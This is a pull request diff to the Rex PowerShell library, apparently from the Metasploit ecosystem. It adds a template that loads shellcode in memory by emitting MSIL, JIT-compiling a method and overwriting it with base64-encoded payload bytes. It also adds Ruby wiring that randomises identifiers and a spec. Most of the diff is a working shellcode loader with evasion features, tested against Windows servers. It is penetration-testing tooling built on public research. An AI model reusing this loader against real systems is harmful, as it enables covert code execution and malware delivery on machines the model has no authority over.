### PR TITLE
Implement MSIL payload in Rex gem via template

### DIFF
--- a/data/templates/to_mem_msil.ps1.template
+++ b/data/templates/to_mem_msil.ps1.template
@@ -1,0 +1,67 @@
+function %{func_build_dyn_type}($%{var_type_name}){
+  $%{var_dyn_asm} = ([AppDomain]::CurrentDomain).DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($%{var_type_name})), [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
+  $%{var_dyn_asm}.SetCustomAttribute((New-Object System.Reflection.Emit.CustomAttributeBuilder((New-Object System.Security.AllowPartiallyTrustedCallersAttribute).GetType().GetConstructors()[0], (New-Object System.Object[](0)))))
+  $%{var_dyn_mod} = $%{var_dyn_asm}.DefineDynamicModule($%{var_type_name})
+  $%{var_dyn_mod}.SetCustomAttribute((New-Object System.Reflection.Emit.CustomAttributeBuilder((New-Object System.Security.UnverifiableCodeAttribute).GetType().GetConstructors()[0], (New-Object System.Object[](0)))))
+  return $%{var_dyn_mod}.DefineType($%{var_type_name}, [System.Reflection.TypeAttributes]::Public)
+}
+function %{func_get_meth_addr}($%{var_tgt_meth}){
+  $%{var_dyn_type} = %{func_build_dyn_type}('%{str_addr_loc}')
+  $%{var_dyn_meth} = ($%{var_dyn_type}.DefineMethod('%{str_tgt_meth}', [System.Reflection.MethodAttributes]::Public -bOr [System.Reflection.MethodAttributes]::Static, $(if ([IntPtr]::Size -eq 4) { [UInt32] } else { [Int64] }), $null)).GetILGenerator()
+  $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldftn, [System.Reflection.MethodInfo]$%{var_tgt_meth})
+  $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ret)
+  return (($%{var_dyn_type}.CreateType()).GetMethod('%{str_tgt_meth}')).Invoke($null, @())
+}
+
+$%{var_dyn_type} = %{func_build_dyn_type}('%{var_src_meth}')
+$%{var_args} = New-Object System.Type[](3)
+$%{var_args}[0] = [IntPtr]
+$%{var_args}[1] = [IntPtr]
+$%{var_args}[2] = [Int32]
+$%{var_dyn_meth} = ($%{var_dyn_type}.DefineMethod('%{str_src_type}', [System.Reflection.MethodAttributes]::Public -bOr [System.Reflection.MethodAttributes]::Static, $null, $%{var_args})).GetILGenerator()
+$%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldarg_0)
+$%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldarg_1)
+$%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldarg_2)
+$%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Volatile)
+$%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Cpblk)
+$%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ret)
+$%{var_src_meth} = ($%{var_dyn_type}.CreateType()).GetMethod('%{str_src_type}')
+
+$%{var_dyn_type} = %{func_build_dyn_type}('%{str_tgt_type}')
+$%{var_args} = New-Object System.Type[](1)
+$%{var_args}[0] = [Int]
+$%{var_dyn_meth} = ($%{var_dyn_type}.DefineMethod('%{str_tgt_meth}', [System.Reflection.MethodAttributes]::Public -bOr [System.Reflection.MethodAttributes]::Static, [Int], $%{var_args})).GetILGenerator()
+$%{var_xor} = 0x41424344
+$%{var_dyn_meth}.DeclareLocal([Int]) | Out-Null
+$%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldarg_0)
+foreach ($CodeBlock in 1..100) {
+  $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldc_I4, $%{var_xor})
+  $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Xor)
+  $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Stloc_0)
+  $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldloc_0)
+  $%{var_xor}++
+}
+$%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldc_I4, $%{var_xor})
+$%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Xor)
+$%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ret)
+$%{var_tgt_meth} = ($%{var_dyn_type}.CreateType()).GetMethod('%{str_tgt_meth}')
+
+foreach ($Exec in 1..20) { $%{var_tgt_meth}.Invoke($null, @(0x11112222)) | Out-Null }
+
+if ( [IntPtr]::Size -eq 4 ) {
+  $%{var_sc} = [Byte[]] @(0x60,0xE8,0x04,0,0,0,0x61,0x31,0xC0,0xC3)
+} else {
+  $%{var_sc} = [Byte[]] @(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57,0x55,0xE8,0x0D,0x00,0x00,0x00,0x5D,0x41,0x5F,0x41,0x5E,0x41,0x5D,0x41,0x5C,0x48,0x31,0xC0,0xC3)
+}
+$%{var_sc} += [System.Convert]::FromBase64String("%{b64shellcode}")
+$%{var_sc_addr} = [Runtime.InteropServices.Marshal]::AllocHGlobal($%{var_sc}.Length)
+[Runtime.InteropServices.Marshal]::Copy($%{var_sc}, 0, $%{var_sc_addr}, $%{var_sc}.Length)
+
+$%{var_args} = New-Object Object[](3)
+$%{var_args}[0] = [IntPtr]$(%{func_get_meth_addr} $%{var_tgt_meth})
+$%{var_args}[1] = $%{var_sc_addr}
+$%{var_args}[2] = $%{var_sc}.Length
+
+$%{var_src_meth}.Invoke($null, $%{var_args})
+
+$%{var_tgt_meth}.Invoke($null, @(0x11112222))

--- a/lib/rex/powershell.rb
+++ b/lib/rex/powershell.rb
@@ -1,13 +1,13 @@
 # -*- coding: binary -*-
 require 'rex/powershell/version'
-require 'rex/powershell/templates'
-require 'rex/powershell/payload'
 require 'rex/powershell/output'
 require 'rex/powershell/parser'
 require 'rex/powershell/obfu'
-require 'rex/powershell/param'
 require 'rex/powershell/function'
+require 'rex/powershell/param'
 require 'rex/powershell/script'
+require 'rex/powershell/templates'
+require 'rex/powershell/payload'
 require 'rex/powershell/psh_methods'
 require 'rex/powershell/command'
 

--- a/lib/rex/powershell/command.rb
+++ b/lib/rex/powershell/command.rb
@@ -296,7 +296,7 @@ EOS
       when 'old'
         Rex::Powershell::Payload.to_win32pe_psh(template_path, pay)
       when 'msil'
-        fail RuntimeError, 'MSIL Powershell method no longer exists'
+        Rex::Powershell::Payload.to_win32pe_psh_msil(template_path, pay)
       else
         fail RuntimeError, 'No Powershell method specified'
     end

--- a/lib/rex/powershell/payload.rb
+++ b/lib/rex/powershell/payload.rb
@@ -73,6 +73,37 @@ module Payload
                                  hash_sub).gsub(/(?<!\r)\n/, "\r\n")
   end
 
+  #
+  # MSIL JIT approach as demonstrated by Matt Graeber
+  # http://www.exploit-monday.com/2013/04/MSILbasedShellcodeExec.html
+  # Referencing PowerShell Empire data/module_source/code_execution/Invoke-ShellcodeMSIL.ps1
+  #
+  def self.to_win32pe_psh_msil(template_path, code)
+    rig = Rex::RandomIdentifier::Generator.new
+    rig.init_var(:func_build_dyn_type)
+    rig.init_var(:func_get_meth_addr)
+    rig.init_var(:var_type_name)
+    rig.init_var(:var_dyn_asm)
+    rig.init_var(:var_dyn_mod)
+    rig.init_var(:var_tgt_meth)
+    rig.init_var(:var_dyn_type)
+    rig.init_var(:var_dyn_meth)
+    rig.init_var(:var_args)
+    rig.init_var(:var_xor)
+    rig.init_var(:var_sc_addr)
+    rig.init_var(:var_sc)
+    rig.init_var(:var_src_meth)
+    rig.init_var(:str_addr_loc)
+    rig.init_var(:str_tgt_meth)
+    rig.init_var(:str_src_type)
+    rig.init_var(:str_tgt_type)
+
+    hash_sub = rig.to_h
+    hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
+
+    read_replace_script_template(template_path, "to_mem_msil.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
+  end
+
 end
 end
 end

--- a/lib/rex/powershell/script.rb
+++ b/lib/rex/powershell/script.rb
@@ -1,6 +1,5 @@
 # -*- coding: binary -*-
 
-
 require 'forwardable'
 
 module Rex
@@ -12,6 +11,11 @@ module Powershell
     include Output
     include Parser
     include Obfu
+    DEFAULT_RIG_OPTS = {
+      max_length: 5,
+      min_length: 2,
+      forbidden: Parser::RESERVED_VARIABLE_NAMES.map {|e| e[1..-1]}
+    }
     # Pretend we are actually a string
     extend ::Forwardable
     # In case someone messes with String we delegate based on its instance methods
@@ -31,9 +35,9 @@ module Powershell
                    :[]=, :encode, :*, :hex, :to_f, :strip!, :rpartition, :ord, :capitalize, :upto, :force_encoding,
                    :end_with?
 
-    def initialize(code)
+    def initialize(code, rig = nil)
       @code = ''
-      @rig = Rex::RandomIdentifier::Generator.new
+      @rig = rig || Rex::RandomIdentifier::Generator.new(DEFAULT_RIG_OPTS)
 
       begin
         # Open code file for reading

--- a/lib/rex/powershell/templates.rb
+++ b/lib/rex/powershell/templates.rb
@@ -2,6 +2,9 @@ module Rex
   module Powershell
     module Templates
 
+      # RandomIdentifier::Generator options
+      DEFAULT_RIG_OPTS = Rex::Powershell::Script::DEFAULT_RIG_OPTS
+
       # The base directory that all Powershell script templates live in
       TEMPLATE_DIR = File.expand_path( File.join( __FILE__ , '..', '..', '..', '..', 'data', 'templates') )
 

--- a/lib/rex/powershell/templates.rb
+++ b/lib/rex/powershell/templates.rb
@@ -14,6 +14,9 @@ module Rex
       # The powershell script template for memory injection using the old method
       TO_MEM_OLD = File.join(TEMPLATE_DIR, 'to_mem_old.ps1.template')
 
+      # The powershell script template for memory injection using the old method
+      TO_MEM_MSIL = File.join(TEMPLATE_DIR, 'to_mem_msil.ps1.template')
+
     end
   end
 end

--- a/spec/rex/powershell/command_spec.rb
+++ b/spec/rex/powershell/command_spec.rb
@@ -235,14 +235,9 @@ RSpec.describe Rex::Powershell::Command do
     end
 
     context 'when method is msil' do
-      it 'should raise an exception' do
-        except = false
-        begin
-          subject.cmd_psh_payload(payload, arch, template_path, method: 'msil')
-        rescue RuntimeError
-          except = true
-        end
-        expect(except).to be_truthy
+      it 'should generate a command line' do
+        code = subject.cmd_psh_payload(payload, arch, template_path, method: 'msil')
+        expect(decompress(code).include?('System.Reflection.MethodInfo')).to be_truthy
       end
     end
 


### PR DESCRIPTION
The MSIL JIT execution approach demonstrated by Matt Graeber back
in 2013 provides a shellcode injection vector without explicit use
of unmanaged memory or even marshalling the associated primitives.

Original post @ Exploit Monday:
*  www.exploit-monday.com/2013/04/MSILbasedShellcodeExec.html

PowerShell Empire full-fledged ps1:
*  github.com/EmpireProject/Empire/blob/
  751d0c15d6f9bc60c116166ec4741d04605632e7/data/module_source/
  code_execution/Invoke-ShellcodeMSIL.ps1

Port the Util::EXE version from local fork, reduce size, implement
template-based approach with the RandomIdentifier::Generator. Use
conditional evaluation to determine if the address of the target
method is expressed as UInt32 or Int64 since UInt64 (as used in
prior work) does not cast to IntPtr in native 64bit execution.

Testing:
*  x86 & x64 payloads against 2008r2 and 2016 x64

Notes:
*  Migration away from sessions created with this payload crashes
the session, likely due to an incorrect return opcode being thrown
into the interpreter. Need to investigate and stabilize.